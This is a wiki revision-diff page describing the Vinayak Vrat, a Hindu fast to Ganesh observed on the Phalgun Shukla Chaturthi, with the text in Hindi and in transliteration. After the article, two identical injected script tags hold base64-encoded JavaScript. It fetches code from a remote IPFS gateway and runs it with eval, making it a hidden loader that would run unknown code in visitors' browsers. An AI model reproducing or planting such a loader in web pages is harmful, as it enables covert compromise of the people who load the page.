Difference between revisions of "विनायक व्रत"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (विनायकव्रत का नाम बदलकर विनायक व्रत कर दिया गया है)
m (Text replace - "==टीका टिप्पणी और संदर्भ==" to "{{संदर्भ ग्रंथ}} ==टीका टिप्पणी और संदर्भ==")
 
(5 intermediate revisions by 3 users not shown)
Line 1: Line 1:
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।  
+
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लिखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।  
 
*यह व्रत [[फाल्गुन]] [[शुक्ल पक्ष]] की [[चतुर्थी]] पर आरम्भ करना चाहिए।  
 
*यह व्रत [[फाल्गुन]] [[शुक्ल पक्ष]] की [[चतुर्थी]] पर आरम्भ करना चाहिए।  
 
*[[गणेश]] देवता की चार [[मास|मासों]] तक पूजा करनी चाहिए।
 
*[[गणेश]] देवता की चार [[मास|मासों]] तक पूजा करनी चाहिए।
 
*प्रत्येक शुक्ल पक्ष की चतुर्थी पर कर्ता नक्त करता है, तिल से होम करता है, तिल का दान करता है।  
 
*प्रत्येक शुक्ल पक्ष की चतुर्थी पर कर्ता नक्त करता है, तिल से होम करता है, तिल का दान करता है।  
 
*अन्त में पाँचवें मास में गणेश की स्वर्णिम प्रतिमा को पायस से पूर्ण चार ताम्र पात्रों एवं तिलपूर्ण एक पात्र के साथ में दान करता है।
 
*अन्त में पाँचवें मास में गणेश की स्वर्णिम प्रतिमा को पायस से पूर्ण चार ताम्र पात्रों एवं तिलपूर्ण एक पात्र के साथ में दान करता है।
*इससे सभी बाधाओं से मुक्ति मिलती है। <ref>भविष्योत्तरपुराण (33|1-13)।</ref>
+
*इससे सभी बाधाओं से मुक्ति मिलती है।<ref>भविष्योत्तरपुराण (33|1-13)।</ref>
 
   
 
   
{{लेख प्रगति
+
{{संदर्भ ग्रंथ}}
|आधार=आधार1
 
|प्रारम्भिक=
 
|माध्यमिक=
 
|पूर्णता=
 
|शोध=
 
}}
 
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>
==संबंधित लिंक==
+
==संबंधित लेख==
 
{{पर्व और त्योहार}}
 
{{पर्व और त्योहार}}
 
{{व्रत और उत्सव}}
 
{{व्रत और उत्सव}}

Latest revision as of 10:21, 21 March 2011

  • bharat mean dharmik vratoan ka sarvavyapi prachar raha hai. yah hindoo dharm granthoan mean ullikhit hindoo dharm ka ek vrat sanskar hai.
  • yah vrat phalgun shukl paksh ki chaturthi par arambh karana chahie.
  • ganesh devata ki char masoan tak pooja karani chahie.
  • pratyek shukl paksh ki chaturthi par karta nakt karata hai, til se hom karata hai, til ka dan karata hai.
  • ant mean paanchavean mas mean ganesh ki svarnim pratima ko payas se poorn char tamr patroan evan tilapoorn ek patr ke sath mean dan karata hai.
  • isase sabhi badhaoan se mukti milati hai.[1]


tika tippani aur sandarbh

  1. bhavishyottarapuran (33|1-13).

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>